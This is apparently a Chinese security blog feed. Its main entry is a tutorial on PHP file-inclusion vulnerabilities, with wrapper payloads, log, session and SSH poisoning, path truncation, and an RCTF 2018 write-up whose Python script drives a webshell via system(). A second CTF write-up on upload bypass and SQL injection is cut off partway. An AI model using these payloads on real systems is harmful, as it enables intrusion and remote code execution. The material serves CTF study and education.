<content type="html"><![CDATA[<center><h2> `"所谓博客,只不过是孤芳自赏罢了"`</h2></center><span id="more"></span><h1 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h1><p>php中引发文件包含漏洞的通常是以下四个函数:</p><ul><li>include()</li><li>include_once()</li><li>require()</li><li>require_once()</li></ul><p>reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。<br><img src="/image/php_file_include/1.png" alt="require"></p><p>include() 如果出错的话,只会提出警告,会继续执行后续语句。</p><p><img src="/image/php_file_include/2.png" alt="include"></p><p>require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。</p><p>当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。测试代码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">include</span> <span class="variable">$file</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>在同目录下有个phpinfo.txt,其内容为<code><? phpinfo(); ?></code>。则只需要访问:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phpinfo.txt</span><br></pre></td></tr></table></figure><p>即可成功解析phpinfo。</p><p><img src="/image/php_file_include/3.png" alt="phpinfo"></p><h2 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h2><ul><li>具有相关的文件包含函数。</li><li>文件包含函数中存在动态变量,比如 <code>include $file;</code>。</li><li>攻击者能够控制该变量,比如<code>$file = $_GET['file'];</code>。</li></ul><h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><ul><li>LFI (Local File Inclusion)</li></ul><p>本地文件包含漏洞,顾名思义,指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏洞都是LFI。简单的测试用例如前所示。</p><ul><li>RFI (Remote File Inclusion)</li></ul><p>远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。<br>但RFI的利用条件较为苛刻,需要php.ini中进行配置</p><ol><li> <code>allow_url_fopen = On</code></li><li> <code>allow_url_include = On</code></li></ol><p>两个配置选项均需要为On,才能远程包含文件成功。</p><p><img src="/image/php_file_include/4.png" alt="RFI"></p><p>在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。</p><h1 id="包含姿势"><a href="#包含姿势" class="headerlink" title="包含姿势"></a>包含姿势</h1><p>下面例子中测试代码均为:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><ul><li>allow_url_fopen 默认为 On</li><li>allow_url_include 默认为 Off</li></ul><p>若有特殊要求,会在利用条件里指出。</p><h2 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h2><h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><p>利用条件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen不做要求。</span><br><span class="line">allow_url_include = On</span><br></pre></td></tr></table></figure><p>姿势:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://input</span><br><span class="line"></span><br><span class="line">POST:</span><br><span class="line"><? phpinfo();?></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/5.png" alt="php://"></p><h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><p>利用条件:默认均可</p><p>姿势:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure><p>通过指定末尾的文件,可以读取经base64加密后的文件源码.</p><p>其他姿势:</p><p><code>index.php?file=php://filter/convert.base64-encode/resource=index.php</code></p><p>效果跟前面一样,少了read等关键字。在绕过一些waf时也许有用。</p><h3 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h3><p>利用条件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php版本大于等于php5.3.0</span><br></pre></td></tr></table></figure><p>姿势:</p><p>假设有个文件<code>phpinfo.txt</code>,其内容为<code><?php phpinfo(); ?></code>,打包成zip压缩包,如下:</p><p><img src="/image/php_file_include/9.png" alt="phar://"></p><p>指定绝对路径</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phar:///var/www/test.zip/phpinfo.txt</span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/7.png" alt="7.png"></p><p>或者使用相对路径(这里test.zip就在上一层目录下)</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phar://../test.zip/phpinfo.txt</span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/6.png" alt="6.png"></p><h1 id="RCTF-2018-Backdoor"><a href="#RCTF-2018-Backdoor" class="headerlink" title="RCTF 2018 Backdoor"></a>RCTF 2018 Backdoor</h1><ul><li><a href="https://xz.aliyun.com/t/2347">RCTF 2018 Writeup — De1ta</a></li></ul><p>一道题考到了<code>php://filter</code> , <code>phar://</code></p><p><a href="http://backdoor.2018.teamrois.cn/">http://backdoor.2018.teamrois.cn/</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://backdoor.2018.teamrois.cn/post.php?action=php://filter/read=convert.base64-encode/resource=post</span><br></pre></td></tr></table></figure><h2 id="post-php"><a href="#post-php" class="headerlink" title="post.php"></a>post.php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">'action'</span>] . <span class="string">'.php'</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>读upload.php源码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://backdoor.2018.teamrois.cn/post.php?action=php://filter/read=convert.base64-encode/resource=upload</span><br></pre></td></tr></table></figure><h2 id="upload-php"><a href="#upload-php" class="headerlink" title="upload.php"></a>upload.php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">'file'</span>])) <span class="keyword">exit</span>;</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">'file'</span>];</span><br><span class="line"><span class="variable">$zip</span> = <span class="keyword">new</span> ZipArchive();</span><br><span class="line"><span class="keyword">if</span> (<span class="literal">true</span> !== <span class="variable">$zip</span>->open(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>])) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'No a valid zip'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="literal">false</span> === <span class="variable">$zip</span>->getFromName(<span class="string">'tmp/random.txt'</span>)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'No file'</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$dest</span> = <span class="string">'uploads/'</span> . md5(<span class="variable">$_SERVER</span>[<span class="string">'REMOTE_ADDR'</span>]) . hash(<span class="string">'sha256'</span>, file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>])) . <span class="string">'.zip'</span>;</span><br><span class="line">move_uploaded_file(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>], <span class="variable">$dest</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'Saved into '</span> . <span class="variable">$dest</span>;</span><br></pre></td></tr></table></figure><p>post.php存在限制后缀的文件包含,可以通过phar://或者zip://协议绕过,从而包含恶意代码getshell,upload.php中限制了上传的文件要是个zip并且里面要有个random.txt文件。</p><p>我们在压缩包中再加入一个 evil.php 文件,当通过post.php 访问 action=phar://dest/evil 时,即访问 phar://dest/evil.php 注意 post.php 中的代码include $_GET[‘action’] . ‘.php’</p><h2 id="exp-py"><a href="#exp-py" class="headerlink" title="exp.py:"></a>exp.py:</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">s = <span class="string">"Saved into "</span></span><br><span class="line">post_url = <span class="string">"http://backdoor.2018.teamrois.cn/post.php?action=upload"</span></span><br><span class="line">zip_file = <span class="built_in">open</span>(<span class="string">"tmp.zip"</span>,<span class="string">"rb"</span>)</span><br><span class="line">upload_file = {<span class="string">'file'</span>:zip_file}</span><br><span class="line">r = requests.post(post_url,files=upload_file)</span><br><span class="line">dest = r.text[<span class="built_in">len</span>(s):]</span><br><span class="line">shell_url = <span class="string">"http://backdoor.2018.teamrois.cn/post.php?action=phar://"</span>+ dest + <span class="string">"/evil"</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"[*] shell url: "</span> + shell_url)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> command = <span class="built_in">input</span>(<span class="string">"command: "</span>)</span><br><span class="line"> payload = {<span class="string">'chybeta'</span>: <span class="string">'system("%s");'</span> % command}</span><br><span class="line"> r = requests.get(shell_url,params=payload)</span><br><span class="line"> <span class="built_in">print</span>(r.text)</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h3><p>利用条件:</p><p>php版本大于等于php5.3.0<br>姿势:<br>构造zip包的方法同phar。</p><p>但使用zip协议,需要指定绝对路径,同时将#编码为%23,之后填上压缩包内的文件。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt</span><br></pre></td></tr></table></figure><p>data:URI schema<br>利用条件:</p><p>php版本大于等于php5.2<br>allow_url_fopen = On<br>allow_url_include = On<br>姿势一:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain,<?php phpinfo();?></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/8.png" alt="data:text/plain,<?php phpinfo();?>"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain,<?php system('whoami');?></span><br></pre></td></tr></table></figure><p><img src="/image/php_file_include/10.png" alt="system()"></p><p>姿势二:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span><br></pre></td></tr></table></figure><p>加号+的url编码为<code>%2b</code>,<code>PD9waHAgcGhwaW5mbygpOz8+</code>的base64解码为:<code><?php phpinfo();?></code></p><p>执行命令:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==</span><br></pre></td></tr></table></figure><p>其中<code>PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==</code>的base64解码为:<code><?php system('whoami');?></code></p><h2 id="包含session"><a href="#包含session" class="headerlink" title="包含session"></a>包含session</h2><p>利用条件:session文件路径已知,且其中内容部分可控。</p><p>姿势:</p><p>php的session文件的保存路径可以在phpinfo的session.save_path看到。</p><p>常见的php-session存放位置:</p><ul><li>/var/lib/php/sessions</li><li>/var/lib/php/sess_PHPSESSID</li><li>/tmp/sess_PHPSESSID</li><li>/tmp/sessions/sess_PHPSESSID</li></ul><p>session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到。<br><img src="/image/php_file_include/16.png" alt="16.png"></p><p>要包含并利用的话,需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候,可以先包含进session文件,观察里面的内容,然后根据里面的字段来发现可控的变量,从而利用变量来写入payload,并之后再次包含从而执行php代码。</p><p>比如这篇文章:<a href="http://kb.hitcon.org/post/165429468072/%E9%80%8F%E9%81%8E-lfi-%E5%BC%95%E5%85%A5-php-session-%E6%AA%94%E6%A1%88%E8%A7%B8%E7%99%BC-rce">透過LFI引入PHP session檔案觸發RCE</a></p><p>總結一下此次經驗</p><p>當遇到 LFI 漏洞時,可以先檢查一下幾種可能的檔案:</p><ul><li>/etc/passwd</li><li>/proc/self/environ</li><li>All possible config files ( e.g. Apache /etc/httpd/conf/httpd.conf )</li><li>Web server access, error log ( e.g. /etc/httpd/logs/access_log )</li><li>Session files ( e.g. /tmp/sess_{SESSION_ID} )</li><li>PHP 使用 $_GET[1]、$_POST[1] 可以避開引號跳脫的問題(前面提到事後得知$_GET[b]即可正常執行)。<h2 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>包含日志</h2></li></ul><p>访问日志</p><p>常见几个路径:</p><ul><li>/var/log/apache/access_log</li><li>/var/www/logs/access_log</li><li>/var/log/access_log</li></ul><p>查看 log </p><p><code>/etc/apache2/sites-enabled/000-default.conf</code></p><p><img src="/image/php_file_include/11.png" alt="000-default.conf"></p><p>利用条件: 需要知道服务器日志的存储路径,且日志文件可读。</p><p>姿势:</p><p>很多时候,web服务器会将请求写入到日志文件中,比如说apache。在用户发起请求时,会将请求写入<code>access.log</code>,当发生错误时将错误写入<code>error.log</code>。默认情况下,日志保存路径在 <code>/var/log/apache2/</code>。</p><p>但如果是直接发起请求,会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。<br><img src="/image/php_file_include/12.png" alt="12.png"></p><p>在一些场景中,log的地址是被修改掉的。你可以通过读取相应的配置文件后,再进行包含。</p><p>这里提供一道包含日志的CTF题目:<a href="https://chybeta.github.io/2017/08/06/SHACTF-2017-Web-writeup/#Methon-Two">SHACTF-2017- Bon Appétit (100)-writeup</a></p><p>以及<a href="http://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/">2018红帽杯</a></p><h2 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h2><p>利用条件:</p><p>需要知道ssh-log的位置,且可读。</p><p>默认情况下为 <code>/var/log/auth.log</code></p><p>姿势:</p><p>用ssh连接:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~$ ssh '<?php phpinfo(); ?>'@remotehost</span><br></pre></td></tr></table></figure><p>之后会提示输入密码等等,随便输入。</p><p>之后进行文件包含即可。</p><p>参考:<a href="http://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/">RCE with LFI and SSH Log Poisoning</a></p><h2 id="包含environ-系统环境"><a href="#包含environ-系统环境" class="headerlink" title="包含environ 系统环境"></a>包含environ 系统环境</h2><p>利用条件:</p><p>php以cgi方式运行,这样environ才会保持UA头。<br>environ文件存储位置已知,且environ文件可读。<br>姿势:</p><p>proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到environ中。之后再包含它,即可。</p><p>可以参考这个:</p><p><a href="http://websecuritylog.blogspot.jp/2010/06/procselfenviron-injection.html">The proc/self/environ Injection</a></p><p><a href="https://www.exploit-db.com/papers/12886/">shell via LFI - proc/self/environ method</a></p><h1 id="本地包含小姿势"><a href="#本地包含小姿势" class="headerlink" title="本地包含小姿势"></a>本地包含小姿势</h1><p>审计中可见这样的包含模版文件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><?php include("inc/" . $_GET['file'] . ".htm"); ?> </span><br></pre></td></tr></table></figure><ul><li>%00截断<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd%00</span><br></pre></td></tr></table></figure>(需要 magic_quotes_gpc=off,PHP小于5.3.4有效)</li></ul><ul><li><p>%00截断目录遍历:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/www/%00</span><br></pre></td></tr></table></figure><p>(需要 magic_quotes_gpc=off,unix文件系统,比如FreeBSD,OpenBSD,NetBSD,Solaris)</p></li><li><p>路径长度截断:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/etc/passwd/././././././.[…]/./././././.</span><br></pre></td></tr></table></figure><p>(php版本小于5.2.8(?)可以成功,linux需要文件名长于4096,windows需要长于256)</p></li><li><p>点号截断:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/boot.ini/………[…]…………</span><br></pre></td></tr></table></figure><p>(php版本小于5.2.8(?)可以成功,只适用windows,点号需要长于256)</p></li></ul><h1 id="参考:"><a href="#参考:" class="headerlink" title="参考:"></a>参考:</h1><p><a href="https://dustri.org/b/from-lfi-to-rce-in-php.html">From LFI to RCE in php</a><br><a href="http://www.cnblogs.com/iamstudy/articles/include_file.html">l3m0n: 文件包含漏洞小结</a><br><a href="https://highon.coffee/blog/lfi-cheat-sheet/">LFI Cheat Sheet</a><br><a href="https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion">Local File Inclusion</a></p><p><a href="http://wiki.wooyun.org/web:lfi">http://wiki.wooyun.org/web:lfi</a></p><p>PHP文件包含漏洞总结:<br><a href="http://drops.wooyun.org/tips/3827">http://drops.wooyun.org/tips/3827</a></p><p>文件包含与注入利用总结:<br><a href="https://www.91ri.org/2736.html">https://www.91ri.org/2736.html</a></p><p>php://input,php://filter,data URI schema的那些事:<br><a href="https://www.91ri.org/7470.html">https://www.91ri.org/7470.html</a></p><p>phar协议:<br><a href="https://www.91ri.org/13363.html">https://www.91ri.org/13363.html</a></p><p>论PHP常见的漏洞:<br><a href="http://drops.wooyun.org/papers/4544">http://drops.wooyun.org/papers/4544</a></p><p>LFI WITH PHPINFO() ASSISTANCE:<br><a href="https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</a></p><p>PHP_LFI_rfc1867_temporary_files:<br><a href="http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf">http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf</a></p><p>zip或phar协议包含文件<br><a href="http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html">http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html</a></p><h1 id="工具-amp-amp-防御"><a href="#工具-amp-amp-防御" class="headerlink" title="工具&&防御"></a>工具&&防御</h1><p>工具:</p><p><a href="https://github.com/P0cL4bs/Kadimus/">https://github.com/P0cL4bs/Kadimus/</a></p><p>防御:</p><ul><li>设置open_basedir</li></ul>]]></content>
<summary type="html"><center><h2> `"所谓博客,只不过是孤芳自赏罢了"`</h2></center></summary>
<category term="php文件包含" scheme="https://cr4ckm3.top/tags/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"/>
</entry>
<entry>
<title>强网杯国际精英邀请赛Web知识点</title>
<link href="https://cr4ckm3.top/2018/05/20/qiangwangbei/"/>
<id>https://cr4ckm3.top/2018/05/20/qiangwangbei/</id>
<published>2018-05-19T16:00:00.000Z</published>
<updated>2019-08-30T10:00:43.723Z</updated>
<content type="html"><![CDATA[<h1 id="py到出题人的说明:"><a href="#py到出题人的说明:" class="headerlink" title="py到出题人的说明:"></a>py到出题人的说明:</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">随意输入用户名进入,用户名使用addslashes过滤,取xff等变量为ip显示</span><br><span class="line"></span><br><span class="line">上传文件黑名单过滤了常见php后缀,大小写不敏感,可以在后缀后加空格绕过检测</span><br><span class="line"></span><br><span class="line">使用fileinfo检测MIME必须为php文件,text/x-php,文件内容检测开头不能使用<?,可以使用bom头绕过内容检测</span><br><span class="line"></span><br><span class="line">随机生成64位长度的文件名,上传成功后在主页显示当前用户上传的文件名,但只显示前10个字符</span><br><span class="line"></span><br><span class="line">文件上传成功时会将用户名,IP和文件名入库,如果用户名长度超过20位则截取前20个字符,所以可以构造一个用户名,前十九位随意填写,第二十位填写单引号等会被addslashes转义的符号,入库时因为有截取操作所以可以使用遗留下来的反斜线吃掉单引号造成注入,IP处可以进行注入,过滤了空格和一些函数,可以使用mid函数进行字符串截取操作</span><br><span class="line"></span><br><span class="line">随意使用一个用户名绕过上传过滤得到一个webshell,构造特殊用户名上传文件通过insert注入获取之前上传得webshell真实文件名,上传目录为常见的uploads文件夹,很容易就能被扫到</span><br><span class="line"></span><br><span class="line">使用构造后的用户名「xxx',」注意有因为注入遗留下来得单引号和逗号 ,登入后可以看到很多个被截断后的文件名,拼接起来就是文件名</span><br></pre></td></tr></table></figure><h1 id="upload-php"><a href="#upload-php" class="headerlink" title="upload.php"></a>upload.php</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">'upfile'</span>])) {</span><br><span class="line"> <span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">'upfile'</span>];</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$file</span> [<span class="string">'error'</span>] > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$file</span> [<span class="string">'error'</span>]) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'The uploaded file exceeds the value of the upload_max_filesize option in the PHP configuration file'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'Exceeded the size of the form MAX_FILE_SIZE limit'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">3</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'File section was uploaded'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">4</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'No upload file selected'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">6</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'No temporary directory found'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">7</span> :</span><br><span class="line"> <span class="keyword">case</span> <span class="number">8</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'System error'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">die</span>(<span class="variable">$mes</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$content</span> = file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> checkMIME(<span class="variable">$file</span>);</span><br><span class="line"> <span class="keyword">if</span> (checkContent(<span class="variable">$content</span>) && checkExts(<span class="variable">$file</span>[<span class="string">'name'</span>])) {</span><br><span class="line"> upload(<span class="variable">$file</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'attack detected'</span>);</span><br><span class="line"> }</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'file not found'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$savepath</span> = dirname(<span class="keyword">__file__</span>) . <span class="string">'/uploads/'</span>;</span><br><span class="line"> <span class="variable">$filename</span> = explode(<span class="string">'.'</span>, <span class="variable">$file</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$newname</span> = rand_name() . <span class="string">"."</span> . trim(end(<span class="variable">$filename</span>));</span><br><span class="line"> <span class="variable">$finalname</span> = <span class="variable">$savepath</span> . <span class="variable">$newname</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>], <span class="variable">$finalname</span>)) {</span><br><span class="line"> <span class="variable">$db</span> = <span class="keyword">new</span> Database();</span><br><span class="line"> <span class="comment">//,1,(select substring(filename,10,10) from(select filename from picture limit 0,1)x))#</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$db</span>->insert(<span class="variable">$_SESSION</span>[<span class="string">'username'</span>], getip(), <span class="variable">$newname</span>)) {</span><br><span class="line"> header(<span class="string">'location: index.php'</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkMIME"><a href="#checkMIME" class="headerlink" title="checkMIME()"></a>checkMIME()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkMIME</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="comment">// text/php text/x-php</span></span><br><span class="line"> <span class="variable">$php_ext</span> = <span class="keyword">array</span>(<span class="string">"text/php"</span>, <span class="string">"text/x-php"</span>);</span><br><span class="line"> <span class="variable">$type</span> = mime_content_type(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> <span 